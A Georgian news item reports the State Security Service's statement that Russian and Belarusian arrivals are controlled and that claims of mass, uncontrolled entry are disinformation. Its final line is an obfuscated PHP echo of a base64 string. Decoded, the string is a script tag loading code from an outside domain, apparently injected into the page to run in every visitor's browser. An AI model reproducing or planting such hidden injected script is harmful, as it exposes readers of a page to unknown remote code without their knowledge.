celsiusi
ავერსი შნაიდერი
სახელმწიფო უსაფრთხოების სამსახური საქართველოში რუსეთიდან და ბელორუსიდან ამ ქვეყნების მოქალაქეების შემოსვლასთან დაკავშირებით განცხადებას ავრცელებს.
 
უწყებაში აცხადებენ, რომ ქვეყანაში არსებული უსაფრთხოების გარემო სრულ კონტროლს ექვემდებარება და სახელმწიფო უსაფრთხოების სამსახური სხვა შესაბამის უწყებებთან ერთად აქტიურ რეჟიმში ატარებს ყველა საჭირო ღონისძიებას, რათა მინიმუმამდე შემცირდეს შესაძლო რისკები და გამოწვევები
 
„ასევე სრულად იქნას გაკონტროლებული ქვეყანაში მყოფი პოტენციური რისკის შემცველი ყველა პირი.
გატარებული ღონისძიებების შედეგად ქვეყნის მასშტაბით შენარჩუნებულია მშვიდი და უსაფრთხო გარემო. ქვეყანაში შემოსული რუსეთის ფედერაციის, ბელარუსის და სხვა უცხო ქვეყნების მოქალაქეების მიერ არ შეიმჩნევა ქვეყნის უსაფრთხოებისათვის რისკის შემცველი აქტივობების განხორციელების ტენდენცია.
 
აქვე უნდა აღინიშნოს, რომ მიმდინარე პერიოდში ქვეყანაში შემომსვლელ პირთა რაოდენობა არ აღემატება გასული წლების ანალოგიური პერიოდის სტატისტიკას. საქართველოს სახელმწიფო, ქვეყნის ტერიტორიაზე უცხო ქვეყნის მოქალაქის დაშვების სუვერენულ უფლებას ახორციელებს კანონმდებლობის სრული დაცვით, არსებული რისკებისა და გამოწვევების შესაბამისად“ – აცხადებენ სახელმწიფო უსაფრთხოების სამსახურში.
 
უწყებაში ამბობენ, რომ დეზინფორმაციაა, თითქოს საქართველოში უცხო ქვეყნის მოქალაქეების, კერძოდ, რუსეთის ფედერაციისა და ბელარუსის მოქალაქეები ე.წ. მასიურად და უკონტროლოდ შემოდიან და ამბობენ, რომ მიმდინარეობს საზოგადოების დაშინება შემოსულ პირთა შორის ე.წ. დივერსანტების, ტერორიზმთან დაკავშირებული ჯგუფების და ა.შ. არსებობის შესახებ.
1011
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");